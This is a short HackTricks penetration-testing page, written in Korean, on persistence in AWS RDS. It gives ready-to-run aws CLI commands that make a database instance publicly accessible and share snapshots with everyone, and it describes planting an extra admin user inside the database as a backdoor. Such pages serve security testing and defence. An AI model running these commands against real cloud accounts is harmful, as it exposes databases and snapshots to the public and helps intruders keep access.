AWS - RDS Persistence

Support HackTricks

RDS

자세한 정보는 다음을 확인하세요:

AWS - Relational Database (RDS) Enum

인스턴스를 공개적으로 접근 가능하게 만들기: rds:ModifyDBInstance

이 권한을 가진 공격자는 기존 RDS 인스턴스를 수정하여 공개 접근성을 활성화할 수 있습니다.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

데이터베이스 내에 관리자 사용자 생성

공격자는 데이터베이스 내에 사용자를 생성할 수 있으므로 마스터 사용자 비밀번호가 수정되더라도 데이터베이스에 대한 접근을 잃지 않습니다.

스냅샷 공개

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
HackTricks 지원하기

Last updated